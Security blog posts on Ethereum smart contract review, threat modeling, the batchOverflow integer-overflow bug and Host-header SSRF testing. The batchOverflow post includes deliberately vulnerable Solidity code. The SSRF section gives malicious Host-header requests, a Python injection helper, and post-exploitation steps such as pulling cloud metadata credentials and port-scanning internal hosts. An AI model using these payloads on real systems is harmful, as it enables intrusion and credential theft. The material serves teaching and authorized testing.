16/03/2021

Ethereum Smart Contract Source Code Review

Introduction

As cryptocurrency technologies become more and more prevalent, banks will soon start adopting them. The Ethereum blockchain and other complex blockchain programs are relatively new and highly experimental. Therefore, we should expect constant changes in the security landscape, as new bugs and security risks are discovered and new best practices are developed [1]. This article is going to discuss how to perform a source code review of Ethereum Smart Contracts (SCs) and what to look for. More specifically, we are going to focus on specific keywords and how to analyse them.

The points analysed are going to be:
  • User supplied input filtering, when interacting directly with SC
  • Interfacing with external SCs
  • Interfacing with DApp applications
  • SC formal verification
  • Wallet authentication in DApp

SC Programming Mindset

When designing an SC ecosystem (a group of SCs constitutes an ecosystem) it is wise to have some specific concepts and security design principles in mind. SC programming requires a different engineering mindset than we may be used to. The cost of failure can be high, and change can be difficult, making it in some ways more similar to hardware programming or financial services programming than web or mobile development.

When programming SCs we should be able to:
  • Carefully design roll-outs
  • Keep contracts simple and modular
  • Be fully aware of blockchain properties
  • Prepare for failure

Key Security Concepts For SCs Systems


More specifically, it is mandatory, and the responsible thing to do, to take the following areas into consideration:
  • SC ecosystem monitoring, e.g. monitoring for unusual transactions
  • SC ecosystem governance/admin, e.g. using proxy SCs that follow best practices
  • Formal verification of all the SCs we interact with
  • Modular/clean SC coding, e.g. using comments and modular code
  • SC ecosystem code auditing by an independent external 3rd party
  • SC ecosystem penetration testing by an independent external 3rd party
Note: At this point we should point out that DApp-to-smart-contract interaction should also be reviewed.

SCs User Input Validation

Make sure you apply user input validation at both the DApp and SC level. Remember that on-chain data is public and an adversary can interact with an SC directly, simply by visiting an Ethereum explorer such as etherscan.io; the following screenshots demonstrate that.

Below we can see an example of a deployed contract:



Simply by clicking on the SC link we can interact with the contract:



Note: Above we can see the upgrade function call and various other Admin functions. Of course, it is not always that easy to interact with them.

It is also known that etherscan.io provides some experimental features to decompile the SC code:


If we click the decompile option, we get the screen below:


Below we can see how a DApp or wallet can interact with a SC:



There are five categories of Ethereum wallets that can interact with DApps:
  • Browser built-in (e.g. Opera, Brave etc)
  • Browser extension (e.g. MetaMask )
  • Mobile wallets (e.g. Trust, Walleth, Pillar etc.)
  • Account-based web wallets (e.g. Fortmatic, 3box etc.)
  • Hardware wallets (e.g. Ledger, Trezor etc.)
There is also a larger category of wallets that cannot integrate with DApps: generic wallet apps that lack the functionality to interact with smart contracts. Different wallets offer a different connection experience. For example, with MetaMask you get a Connect pop-up, while with mobile wallets you scan a QR code. Phishing attacks therefore take a different form in each case; e.g. an attacker can spoof a QR code through a free online QR generator. When assessing a DApp, the architecture is of paramount importance. A user with the MetaMask plugin can use it to connect to the DApp, and the DApp will automatically associate the interaction with the user's public key to run various tasks.

For a Web-based DApp we can use traditional filtering methods. For SCs written in Solidity, we can use assert and require, convenience functions that check for conditions (e.g. a user supplies input and these functions check whether the conditions are met). When a condition is not met, they throw an exception, which helps us handle the error.

These are the cases in which Solidity creates an assert-type exception [3]:
  • We invoke assert with an argument that evaluates to false.
  • We invoke a zero-initialized variable of an internal function type.
  • We convert a value that is too big or negative into an enum type.
  • We divide or modulo by zero.
  • We access an array at an index that is too big or negative.
The require Solidity function guarantees validity of conditions that cannot be detected before execution. It checks inputs, contract state variables and return values from calls to external contracts.

In the following cases, Solidity triggers a require-type exception [3]:
  • We call require with arguments that evaluate to false.
  • A function called through a message call does not finish properly.
  • We create a contract with the new keyword and the creation does not finish properly.
  • We call an external function on a contract that contains no code.
  • Our contract receives Ether through a public getter function.
  • A .transfer() ends in failure.
Generally speaking, when handling complex user input and running mathematical calculations, it is mandatory to use audited 3rd-party libraries. A code project to look into is SafeMath from OpenZeppelin. SafeMath is a wrapper over Solidity's arithmetic operations with added overflow checks. Arithmetic operations in Solidity wrap on overflow. This can easily result in bugs, because programmers usually assume that an overflow raises an error, which is the standard behavior in high-level programming languages. SafeMath restores this intuition by reverting the transaction when an operation overflows.
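The difference between wrapping and checked arithmetic can be illustrated with a short Python sketch (an illustration, not Solidity: the function names and 256-bit masking are mine, modeling pre-0.8.0 Solidity semantics and a SafeMath-style checked add):

```python
UINT256_MAX = 2**256 - 1

def wrapping_add(a, b):
    # Models Solidity (< 0.8.0) semantics: the result silently wraps mod 2**256.
    return (a + b) & UINT256_MAX

def safe_add(a, b):
    # Models SafeMath-style semantics: revert (here: raise) on overflow.
    c = a + b
    if c > UINT256_MAX:
        raise OverflowError("SafeMath: addition overflow")
    return c

print(wrapping_add(UINT256_MAX, 1))  # 0: the overflow goes unnoticed
```

The wrapping version is how an overflow bug slips through unnoticed; the checked version aborts the whole operation instead.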

SC External Calls


Calls to untrusted 3rd-party Smart Contracts can introduce several security issues. External calls may execute malicious code in that contract or in any other contract it depends upon. As such, every external call should be treated as a potential security risk. Solidity's call function is a low-level interface for sending a message to an SC. It returns false if the subcall encounters an exception; otherwise it returns true. There is no notion of a legal call: if it compiles, it is valid Solidity.


Especially when the return value of a message call is not checked, execution will resume even if the called contract throws an exception. If the call fails accidentally or an attacker forces the call to fail, this may cause unexpected behavior in the subsequent program logic. Always make sure to handle the possibility that the call will fail by checking the return value of that function [4].
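The failure mode can be modeled in a few lines of Python (a sketch, not Solidity: the helper names are mine, imitating how a low-level call signals failure via a boolean instead of an exception):

```python
def low_level_call(subcall):
    # Models Solidity's low-level call: failures are reported as a False
    # return value instead of a propagated exception.
    try:
        subcall()
        return True
    except Exception:
        return False

def failing_subcall():
    raise RuntimeError("subcall reverted")

# Bad pattern: the return value is ignored, so later logic runs as if
# the call had succeeded.
low_level_call(failing_subcall)
paid_out = True  # unexpected state: we "recorded" a payment that failed

# Safe pattern: check the return value and handle the failure explicitly.
success = low_level_call(failing_subcall)
if not success:
    paid_out = False
```

The point is that nothing stops execution after the failed subcall; only the explicit check does.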

Reentrancy (Recursive Call Attack)

One of the major risks of calling external contracts is that they can take over the control flow. In the reentrancy attack (a.k.a. recursive call attack) calling external contracts can take over the control flow, and make changes to your data that the calling function wasn’t expecting. A reentrancy attack occurs when the attacker drains funds from the target contract by recursively calling the target’s withdraw function [4].
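To make the control-flow takeover concrete, here is a minimal Python simulation (an illustration of the pattern, not real contract code: the class and method names are mine) of the classic vulnerable withdraw, where the contract sends funds before updating the balance and the attacker's receive callback re-enters:

```python
class VulnerableBank:
    """Simulates a contract whose withdraw() sends before updating state."""
    def __init__(self):
        self.balances = {}

    def deposit(self, who, amount):
        self.balances[who] = self.balances.get(who, 0) + amount

    def withdraw(self, who):
        amount = self.balances.get(who, 0)
        if amount > 0:
            who.receive(self, amount)   # external call FIRST (the bug)
            self.balances[who] = 0      # state update happens too late

class Attacker:
    def __init__(self, max_reentries=3):
        self.stolen = 0
        self.reentries = max_reentries

    def receive(self, bank, amount):
        self.stolen += amount
        if self.reentries > 0:          # re-enter before the balance is zeroed
            self.reentries -= 1
            bank.withdraw(self)

bank = VulnerableBank()
attacker = Attacker()
bank.deposit(attacker, 100)
bank.withdraw(attacker)
print(attacker.stolen)  # 400: the single 100 deposit is paid out four times
```

Swapping the two lines in withdraw (update state, then send) closes the hole; this is the checks-effects-interactions pattern.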

Below we can see a schematic representation:




Note: For more information on this type of attack please see [4]

SC Denial of Service Attacks

Each block has an upper bound on the amount of gas that can be spent, and thus on the amount of computation that can be done. This is the Block Gas Limit. If the gas spent exceeds this limit, the transaction will fail.

This leads to a couple of possible Denial of Service vectors:
  • Gas Limit DoS on a Contract via Unbounded Operations
  • Gas Limit DoS on the Network via Block Stuffing
Note: For more information on DoS attacks see consensys.github.io

Use Of Delegatecall/Callcode and Libraries

According to the Solidity docs [7], there exists a special variant of a message call, named delegatecall, which is identical to a message call except that the code at the target address is executed in the context of the calling contract, and msg.sender and msg.value do not change their values.

This means that a contract can dynamically load code from a different address at runtime. Storage, current address and balance still refer to the calling contract, only the code is taken from the called address. This makes it possible to implement the “library” feature in Solidity: Reusable library code that can be applied to a contract’s storage, e.g. in order to implement a complex data structure.
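Conceptually (a Python sketch, not Solidity: the names are mine), delegatecall runs the callee's code against the caller's storage:

```python
class Contract:
    def __init__(self):
        self.storage = {}

def library_increment(storage):
    # "Library" code: it manipulates whatever storage it is handed.
    storage["counter"] = storage.get("counter", 0) + 1

def delegatecall(caller, library_fn):
    # The code comes from the library, but reads and writes hit the
    # CALLER's storage, mirroring delegatecall semantics.
    library_fn(caller.storage)

caller = Contract()
delegatecall(caller, library_increment)
print(caller.storage["counter"])  # 1: the caller's own storage changed
```

This is exactly why the feature is powerful and dangerous: whoever controls the library code controls the caller's state.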

Improper use of this function was the cause of the Parity Multisig Wallet hack in 2017. The function is very useful for granting our contract the ability to make calls to other contracts, as if that code were part of our own contract. However, using delegatecall() can make all public functions of the called contract callable by anyone, and this behavior was not recognized when Parity built its own custom libraries.

Epilogue 

Writing secure smart contract code is a lot of work and can be very complex.

References:


15/03/2021

Elusive Thoughts celebrates 9 years of blogging about hacking


Elusive Thoughts just created its first non-fungible token (NFT), a digital file whose unique identity and ownership are verified on a blockchain (a digital ledger). 


There is a hidden secret in my NFT, please find it.


Buy my NFT at rarible.com

 

14/02/2021

Threat Modeling Smart Contract Applications

INTRODUCTION 

Ethereum Smart Contracts and other complex blockchain programs are new, promising and highly experimental. Therefore, we should expect constant changes in the security landscape, as new bugs and security risks are discovered, and new best practices are developed [1]. 

This article is going to focus on threat modeling of smart contract applications. Threat modeling is a process by which threats, such as the absence of appropriate safeguards, can be identified and enumerated, and mitigations can be prioritized accordingly. The purpose of a threat model is to provide smart contract application defenders with a systematic analysis of which controls or defenses need to be included, given the nature of the system, the probable attacker's profile, the most likely attack vectors, and the assets most desired by an attacker.

Smart contract programming requires a different engineering mindset than we may be used to. The cost of failure can be high, and change can be difficult, making it in some ways more similar to hardware programming or financial services programming than web or mobile development. 

FORMAL VERIFICATION AND SMART CONTRACTS

At this point we should make clear that besides threat modeling, or as part of the threat modeling process, formal verification should also be mandatory. Formal verification is the act of proving or disproving the correctness of the intended algorithms underlying a system with respect to a certain formal specification or property, using formal methods of mathematics. In a few words, it is crucial for the code to do what it is supposed to do [2].

A very good example project, as far as formal verification is concerned, is the Cardano cryptocurrency technology. Cardano is developing a technology with a provably correct security model that provides a guaranteed limit on adversarial power [3]. Cardano also uses Haskell, a programming language that facilitates formal verification.

SMART CONTRACT ASSETS

In order to continue analyzing the Smart Contract ecosystem, we will first define what assets are in the context of Smart Contract applications.

Assets are:
  • The Smart Contract functions we need to protect.
  • The Smart Contract data we need to protect.

THREAT ACTORS

This section is going to focus on the threat actors of smart contract applications. A threat actor or malicious actor is a person or entity responsible for an event or incident that impacts the safety or security of smart contract applications. In the context of this article, the term is used to describe individuals and groups that perform malicious acts.

More specifically we are going to reference the following actors:
  • Nation State Actor with unlimited resources 
  • Organized Crime Actor with significant resources 
  • Insiders Actor with extensive knowledge of the system 
  • Hacktivists Actor with ideology as a motive and limited resources
  • Script Kiddies with limited knowledge of the technology and very few resources
  • Others Actors, such as accidental attacks
Note: From a threat intelligence perspective, threat actors are often categorized as either unintentional or intentional, and either external or internal. Threat agents should also be categorized primarily based on access, e.g. external or internal actors. The likelihood of a threat is closely related to the attacker's motive; e.g. a Nation State actor has a high level of motivation, while Script Kiddies have a low level of motivation and therefore low likelihood.

SMART CONTRACT THREAT ACTORS

In this section we are going to discuss the threat actors that relate only to Smart Contract applications. Each technology has its own peculiarities, and blockchain technologies are no exception.

The actors related to Smart Contracts are of two types:
  • Malicious Smart Contracts 
  • Humans interacting with Smart Contracts through DApps or directly.
Smart contracts can call functions of other contracts and are even able to create and deploy other contracts (e.g. issuing coins). There are several use-cases for this behavior.

A few use cases of interacting with other contracts are described below:
  • Use contracts as data stores
  • Use other contracts as libraries
In the context of this article, an Actor interacting with a Smart Contract from outside the blockchain is an external Actor, and an Actor interacting with a Smart Contract from inside the blockchain is an internal Actor.

COMMON SMART CONTRACT ATTACKS

The following is a list of known attacks which we should be aware of, and defend against when writing smart contracts [4]. 
  • Reentrancy
    • Reentrancy on a Single Function
    • Cross-function Reentrancy
  • Timestamp Dependence
  • Integer Overflow and Underflow
  • DoS with (Unexpected) revert
  • DoS with Block Gas Limit
  • Gas Limit DoS on the Network via Block Stuffing
  • Insufficient gas griefing
  • Forcibly Sending Ether to a Contract
We are not going to explain each attack here. For more information please see the link [4].

ATTACK TREES

This section is going to focus on the attack trees of smart contract applications. Attack Trees provide a formal, methodical way of describing the security of systems, based on varying attacks. A tree structure is used to represent attacks against a system, with the goal as the root node and different ways of achieving that goal as leaf nodes.

The attack attributes assist in associating risk with an attack. An Attack Tree can include special knowledge or equipment that is needed, the time required to complete a step, and the physical and legal risks assumed by the attacker. The values in the Attack Tree could also be operational or development expenses. An Attack Tree supports design and requirement decisions. If an attack costs the perpetrator more than the benefit, that attack will most likely not occur. However, if there are easy attacks that may result in benefit, then those need a defense.
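The cost reasoning above can be made concrete with a tiny evaluator (a Python sketch with hypothetical node names and cost values, not data from a real assessment): OR nodes take the cheapest child, AND nodes sum their children, and the root value estimates the cheapest attack path.

```python
def attack_cost(node):
    # Leaf: (name, cost). Internal node: (name, "OR" | "AND", [children]).
    if len(node) == 2:
        return node[1]
    _name, kind, children = node
    costs = [attack_cost(child) for child in children]
    return min(costs) if kind == "OR" else sum(costs)

# Hypothetical tree: goal at the root, attack steps as children.
tree = (
    "Steal funds from contract", "OR", [
        ("Exploit reentrancy bug", 1_000),
        ("Phish the admin key", "AND", [
            ("Build fake DApp front-end", 500),
            ("Deliver phishing campaign", 2_000),
        ]),
    ],
)
print(attack_cost(tree))  # 1000: reentrancy is the cheapest path
```

If the cheapest path costs more than the expected benefit, the attack will most likely not occur; otherwise that path needs a defense first.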

Below we can see a typical client browser attack tree:



ABUSE CASE DIAGRAMS

The relationships between the work products of a security engineering process can be hard to understand, even for persons with a strong technical background but little knowledge of security engineering. Market forces are driving software practitioners who are not security specialists to develop software that requires security features. When these practitioners develop software solutions without appropriate security-specific processes and models, they sometimes fail to produce effective solutions. Same thing happens with Smart Contract development, that is why abuse case diagrams should be used to model the security requirements of Smart Contract applications.

We will define an abuse case as a specification of a type of complete interaction between a system and one or more actors, where the results of the interaction are harmful to the system, one of the actors, or one of the stakeholders in the system.

Below we can see a simple use case diagram:


Below we can see a simple abuse case diagram with an external actor:



In the diagram above, an external bad actor is manipulating the login function externally. This is a typical client browser attack; e.g. the DApp has a stored XSS vulnerability and the attacker installs a fake login page, or the DApp does not handle users' private keys correctly.

Below we can see another simple abuse case diagram with an external actor:


Again, in the diagram above an external bad actor is manipulating the approve function externally. This is a typical client browser attack; e.g. the DApp has a CSRF vulnerability and the attacker exploits it through a phishing attack.

Below we can see a simple abuse case diagram with an internal actor:


Again, in the diagram above an internal bad actor, this time, is manipulating the approve function internally. This is an attack conducted internally by a malicious contract, e.g. running a Reentrancy attack using the callback function etc.

LAST WORDS

Before releasing any Smart Contract system, make sure the system is pen-tested, the code is reviewed, and formal verification of the contract is in place.

For code reviews make sure to:
  • Use a consistent code style
  • Avoid leaving commented code
  • Avoid unused code and unnecessary inheritance 
  • Use a fixed version of the Solidity compiler 
  • Analyse gas usage
For pen-test make sure to:
  • Run a normal Web App pen-test for the web component of the DApp
  • Check how the DApp is interacting with the Smart Contract
A logical flow to follow would be:



TOOLS TO USE

Below there is a list of tools we can utilize to test our Smart Contract system:
  • Mythril :- Mythril is a security analysis tool for EVM bytecode. It detects security vulnerabilities in smart contracts built for Ethereum, Hedera, Quorum, VeChain, Rootstock, Tron and other EVM-compatible blockchains.
  • Solhint :- Solhint is an open source project for linting Solidity code. This project provides both Security and Style Guide validations.
References: 


06/02/2021

Get Rich Or Die Trying

Introduction



This article is going to focus on "Programmable Money Overflow Attacks" on Ethereum; this is one way hackers can become rich and famous. More specifically, we are going to discuss the batchOverflow attack. The batchOverflow bug (CVE-2018-10299) was identified in multiple ERC20 Smart Contracts [3] back in 2018, when Ethereum was relatively new [1].

The batchOverflow attack is a typical integer overflow attack in the batchTransfer function of a smart contract implementation for the Beauty Ecosystem Coin (BEC). The BEC was an Ethereum ERC20 compliant token that allowed attackers to accomplish an unauthorized increase of digital assets by providing two _receivers arguments in conjunction with a large _value argument, as exploited in the wild in April 2018 [2]. But before we move into replicating the attack, it is better if we explain a few Blockchain properties.

The Code Is Law Principle  

The "code is law principle" is the principle that no one has the right to censor the execution of code on the ETH blockchain. In layman's terms this means that as soon as a smart contract is deployed on the ETH blockchain, then the code cannot change. One of the main defining properties of Ethereum Smart Contracts is that their code is immutable. Blockchain immutability means that all the engaging parties agree to the terms or “code” of the Smart Contract, that code can’t be changed by any party unilaterally [4]. And this is the main reason a Smart Contract gets trustworthy.


Well, that is not exactly true: a contract can be a) destroyed or b) upgraded. Which essentially means that the code:
  • In the first scenario will stop functioning, but won't get deleted (because a blockchain is immutable)
  • In the second scenario the smart contract will get:
    • Upgraded, modifying its code without preserving its address, state, and balance.
    • Upgraded, modifying its code while preserving its address, state, and balance, by using special tools (e.g. OpenZeppelin Upgrades Plugins or proxy smart contracts) [7].
Below we can see an Ethereum blockchain [6]:


Each block has a "state root" which contains accounts. When a contract is destroyed, its account under the state root is zeroed: the opcode triggered by a self-destruct zeroes out the smart contract's account. The Bitcoin ledger is based on recording transactions, while the Ethereum blockchain is based on managing account balances. Why am I giving you all this information? Well, to put it simply, to explain that deleting or upgrading a Smart Contract is not an easy job. And guess what: in order to install a security patch to a smart contract, we need either to destroy the old smart contract and create a new one, or to upgrade the current smart contract. This essentially means that Smart Contract governance is important. In the early stages of the cryptocurrency space, such governance was not something that was carefully designed.

The Money Overflow

Below we can see some vulnerable code that explains the actual vulnerability. The following code replicates the vulnerable behavior and the insufficient user input validation.

pragma solidity ^0.4.10;

contract TheOverflow {
     
    mapping (address => uint) contractBalances;
  
    function contribute() payable { 
        contractBalances[msg.sender] += msg.value; // accumulate the sender's deposit
    }
  
    function getBalance() constant returns (uint) {
        return contractBalances[msg.sender]; 
    }
    
    function batchTransfer(address[] _receivers, uint _value) { 
    // This is the infamous batchTransfer vulnerable function
    // Overflow line, that caused the hack
        uint totalReceivers = _receivers.length * _value;
        
        require(contractBalances[msg.sender] >= totalReceivers); // Here is the user input validation
        contractBalances[msg.sender] = contractBalances[msg.sender] - totalReceivers;
        
        for(uint counter=0; counter< _receivers.length; counter++) { // Here is the function loop
            contractBalances[_receivers[counter]] = contractBalances[_receivers[counter]] + _value;
        }  
    }
}

The way the batchTransfer function works is that it accepts as input the receivers' addresses and the value to transfer; e.g. it will take a list of three or more addresses, along with the amount of tokens to transfer. Then it gets the number of receivers and checks the sender's balance, i.e. whether the address initiating the transfer holds enough tokens to cover all of them.

The vulnerable batchTransfer function shown in the code above works as follows:
  1. The variable _value accepts the amount to be transferred as user input (declared as a 256-bit unsigned integer).
  2. By supplying a huge _value together with two receivers, the multiplication _receivers.length * _value overflows and totalReceivers wraps around to zero.
  3. With totalReceivers zeroed out, the require check is bypassed.
  4. The require check becomes 0 >= 0, which is a true condition, and each receiver is then credited the astronomical _value.
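The steps above can be reproduced off-chain with a short Python simulation of the 256-bit wrapping arithmetic (an illustration of the bug, not the on-chain exploit; the function and address names are mine):

```python
UINT256 = 2**256

def batch_transfer(balances, sender, receivers, value):
    # Replicates the vulnerable Solidity logic with wrapping arithmetic.
    total = (len(receivers) * value) % UINT256      # wraps around to 0
    assert balances.get(sender, 0) >= total         # models require: 0 >= 0 passes
    balances[sender] = (balances.get(sender, 0) - total) % UINT256
    for r in receivers:
        balances[r] = (balances.get(r, 0) + value) % UINT256

balances = {"attacker": 0}
huge = 2**255   # 2 receivers * 2**255 == 2**256 == 0 mod 2**256
batch_transfer(balances, "attacker", ["addr1", "addr2"], huge)
print(balances["addr1"] == huge)  # True: tokens credited out of thin air
```

With an attacker balance of zero, the wrapped total of zero sails through the check and both receiver addresses are credited 2**255 tokens each.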

What Is An ERC20 Token And Why It Is Relevant

ERC-20 has emerged as a Smart Contract de-facto technical standard; it is used for all Smart Contracts on the Ethereum blockchain for token implementation and provides a list of rules that all Ethereum-based tokens must follow [9]. This means that in order for a token to run on the Ethereum, it has to implement certain functionality, or more specifically an interface. 

As of October 2019, more than 200,000 ERC-20-compatible tokens existed on Ethereum's main network. ERC-20 defines a common list of rules that all Ethereum tokens must adhere to. Some of these rules cover how the tokens can be transferred, how transactions are approved, how users can access data about a token, and the total supply of tokens [9]. Consequently, this particular standard empowers developers of all types to accurately predict how new tokens will function within the larger Ethereum system. The same applies to attackers: a hacker understands that all ERC20 tokens must implement certain functionality in order to interface with the Ethereum blockchain. But the implementation details of these functions are handled by the developer, not the standard.
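For reference, the six functions every ERC-20 token must expose can be sketched as an interface (a Python sketch of the shape of the standard; the real standard is specified for Solidity in EIP-20, and also defines Transfer and Approval events not shown here):

```python
from abc import ABC, abstractmethod

class ERC20Interface(ABC):
    """The six required ERC-20 functions, as an abstract interface (sketch)."""
    @abstractmethod
    def totalSupply(self) -> int: ...
    @abstractmethod
    def balanceOf(self, owner: str) -> int: ...
    @abstractmethod
    def transfer(self, to: str, value: int) -> bool: ...
    @abstractmethod
    def transferFrom(self, frm: str, to: str, value: int) -> bool: ...
    @abstractmethod
    def approve(self, spender: str, value: int) -> bool: ...
    @abstractmethod
    def allowance(self, owner: str, spender: str) -> int: ...
```

The standard fixes the names and signatures; how each function is implemented, as batchOverflow showed, is entirely up to the developer.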

How Did Exchanges React To The Hack?

Due to a lack of coordination between Centralized Exchanges (CEX) and Decentralized Exchanges (DEX), no immediate response took place. This resulted in hacking attacks continuing over a long period of time, even after the hack had been noticed. An extra layer of security must be added that monitors Smart Contract behavior and takes action accordingly. For example, in our attack scenario the suspicious transaction should have been blocked due to the excessive withdrawal of funds.

The Impact

The bug was discovered on 04/22/2018 and the weakness was released on 04/23/2018 (Website). The advisory is shared at dasp.co. This vulnerability has been uniquely identified as CVE-2018-10299 since 04/22/2018. It is possible to initiate the attack remotely. No form of authentication is needed for exploitation, but it demands some form of user interaction by the victim. Technical details are known, but no exploit is available. The price for an exploit might be around USD $5k-$25k at the moment (estimate calculated on 01/30/2020) [8].

References:


22/02/2020

SSRFing External Service Interaction and Out of Band Resource Load (Hacker's Edition)


In the recent past we encountered two relatively new types of attacks: External Service Interaction (ESI) and Out-of-Band Resource Loads (OfBRL).

  1. An ESI [1] occurs only when a web application allows interaction with an arbitrary external service.
  2. OfBRL [6] arises when it is possible to induce an application to fetch content from an arbitrary external location, and incorporate that content into the application's own response(s).
Taxonomy Note (2026): Both ESI and OfBRL are now classified under OWASP A10:2021 — SSRF and map to CWE-918 (Server-Side Request Forgery). ESI also maps to CWE-441 (Unintentional Proxy or Intermediary).

The Problem with OfBRL

The ability to request and retrieve web content from other systems can allow the application server to be used as a two-way attack proxy (when OfBRL is applicable) or a one-way proxy (when ESI is applicable). By submitting suitable payloads, an attacker can cause the application server to attack, or retrieve content from, other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

The Problem with ESI

External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to trigger arbitrary external service interactions does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application. However, in many cases, it can indicate a vulnerability with serious consequences.

Figure 1 — ESI (one-way) vs OfBRL (two-way) attack paths

The Verification

We do not have ESI or OfBRL when:

  1. In Collaborator, the source IP is our browser IP (the server didn't make the request).
  2. There is a 302 redirect from our host to the Collaborator (i.e. our source IP appears in the Collaborator logs, not the server's).

Below we can see the original configuration in the repeater, followed by the modified configuration for the test. In the original request, the Host header reflects the legitimate domain. In the test request, we replace it with our Collaborator payload or target host.

Original request

GET / HTTP/1.1
Host: our_vulnerableapp.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close

Malicious requests

GET / HTTP/1.1
Host: malicious.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close

GET / HTTP/1.1
Host: 127.0.0.1:8080
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
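These probe requests can also be generated programmatically. The Python sketch below only builds the raw request bytes (the function name is mine; actually sending them over a socket, and the choice of Collaborator payload, are left out as environment-specific):

```python
def build_probe(host_header, path="/"):
    # Craft a raw HTTP/1.1 request whose Host header is attacker-controlled,
    # mirroring the Repeater payloads above.
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host_header}\r\n"
        "Pragma: no-cache\r\n"
        "Cache-Control: no-cache, no-transform\r\n"
        "Connection: close\r\n"
        "\r\n"
    )

probe = build_probe("127.0.0.1:8080")
```

Substituting a Collaborator payload or an internal address for the Host value reproduces the two malicious requests shown above.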

If the application is vulnerable to OfBRL, the reply is going to be processed by the vulnerable application, bounce back to the sender (the attacker) and potentially load in the context of the application. If the reply does not come back to the sender, then we might have an ESI, and further investigation is required.

The RFCs Updated

This is usually a platform issue and not an application one. In some scenarios, when we have, for example, a CGI application, the HTTP headers are handled by the application (i.e. the app dynamically manipulates the HTTP headers to run properly). This means that HTTP headers such as Location and Host are handled by the app, and therefore a vulnerability might exist. It is recommended to run HTTP header integrity checks when you own a critical application that is running on your behalf.

For more information on the subject, read RFC 9110 (HTTP Semantics, June 2022) [2] and RFC 9112 (HTTP/1.1 Message Syntax and Routing) [2b], which supersede the obsolete RFC 2616. The Host request-header field specifies the Internet host and port number of the resource being requested, as obtained from the original URI. The Host field value MUST represent the naming authority of the origin server or gateway given by the original URL. This allows the origin server or gateway to differentiate between internally-ambiguous URLs, such as the root "/" URL of a server for multiple host names on a single IP address.

RFC Update: RFC 2616 was obsoleted in 2014 by RFCs 7230–7235, which were themselves superseded by RFCs 9110–9112 in June 2022. All references in this article now point to the current standards.

When TLS is enforced throughout the whole application (even the root path /), an ESI or OfBRL is significantly harder to exploit, because TLS authenticates the origin: once a connection is established, the certificate presented must match the server name the client requested, so a spoofed name typically produces an SNI/certificate mismatch error.

SNI prevents what's known as a "common name mismatch error": when a client device reaches the IP address of a vulnerable app, but the name on the TLS certificate doesn't match the name of the website. SNI was added to the IETF's Internet RFCs in June 2003 through RFC 3546, with the latest version in RFC 6066. The current TLS 1.3 specification is RFC 8446 [10].

ECH Warning (2025+): Encrypted Client Hello (ECH), developed in the IETF TLS working group (with its requirements analysis in RFC 8744) and actively being deployed by major browsers and CDNs, encrypts the SNI field within the TLS handshake. This means that SNI-based filtering and inspection at network perimeters becomes ineffective when ECH is in use. Security teams should account for this when relying on SNI as a defensive control.
[Figure: the attacker presents SNI evil.com in the TLS ClientHello; the TLS termination point holds a certificate for vulnapp.com; the SNI mismatch check (evil.com != vulnapp.com) refuses the connection. Note: ECH encrypts the SNI and changes this model.]
Figure 2 — TLS/SNI protection mechanism (and its ECH caveat)

The option to trigger an arbitrary external service interaction does not constitute a vulnerability in its own right, and in some cases it might even be the intended behavior of the application. But we as hackers want to exploit it: what can we do with an ESI or an Out-of-Band Resource Load?

The Infrastructure

Well, it depends on the overall setup. The highest-value scenarios are the following:

  1. The application is behind a WAF (with restrictive ACLs)
  2. The application is behind a UTM (with restrictive ACLs)
  3. The application is running multiple applications in a virtual environment
  4. The application is running behind a NAT
  5. The application runs in a cloud environment with metadata endpoints accessible from localhost
  6. The application runs in a containerized environment (Docker/Kubernetes) with internal service discovery

In order to perform the attack, we simply inject our host value in the HTTP Host header (hostname including port).
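For illustration, this injection can be reproduced outside of Burp with plain Python sockets. The sketch below is a minimal helper under stated assumptions: the target address and injected host are hypothetical placeholders, and you should only probe systems you are authorized to test.

```python
import socket

def build_request(injected_host: str, path: str = "/") -> bytes:
    """Build a raw HTTP/1.1 request whose Host header we fully control."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {injected_host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()

def probe(target_ip: str, target_port: int, injected_host: str) -> bytes:
    """Connect to the real target but lie in the Host header."""
    with socket.create_connection((target_ip, target_port), timeout=5) as s:
        s.sendall(build_request(injected_host))
        return s.recv(65536)

# Example (authorized testing only; hypothetical target):
#   probe("203.0.113.10", 80, "127.0.0.1:8080")
```

Raw sockets are used deliberately: higher-level clients tend to normalize or overwrite the Host header, which defeats the point of the test.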

[Figure: the attacker sends Host: 127.0.0.1:8080; the WAF/UTM/load balancer passes the request because the Host is trusted; the vulnerable app server in the DMZ processes the injected Host, reaching localhost admin panels (127.0.0.1:*), internal management UIs, DMZ hosts (192.168.x.x), cloud metadata (169.254.169.254), and container services (K8s API, sidecars). The trusted app-server IP bypasses ACLs, firewalls, and network segmentation.]
Figure 3 — Host header injection pivoting through infrastructure (including cloud/container targets)

The Test

Burp Professional edition has a feature named Collaborator. Burp Collaborator is a network service that Burp Suite uses to help discover vulnerabilities such as ESI and OfBRL [3]. A typical example would be to use Burp Collaborator to test if ESI exists.

Burp Collaborator request

GET / HTTP/1.1
Host: edgfsdg2zjqjx5dwcbnngxm62pwykabg24r.burpcollaborator.net
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: keep-alive

Burp Collaborator response

HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 53

<html><body>drjsze8jr734dsxgsdfl2y18bm1g4zjjgz</body></html>

The Post Exploitation

As hacker-artists, we now think about how to exploit this. The scenarios are: [7] [8]

  1. Attempt to load the local admin panels.
  2. Attempt to load the admin panels of surrounding applications.
  3. Attempt to interact with other services in the DMZ.
  4. Attempt to port scan localhost.
  5. Attempt to port scan DMZ hosts.
  6. Use it to exploit IP trust and run a DoS attack against other systems.
  7. Access cloud metadata endpoints to extract IAM credentials or instance identity tokens.
  8. Probe Kubernetes API or container sidecar services (e.g. Envoy admin on localhost:15000).

A good tool for automating this is Burp Intruder [4]. Using Sniper mode, we can:

  1. Rotate through different ports, using the vulnapp.com domain name.
  2. Rotate through different ports, using the vulnapp.com external IP.
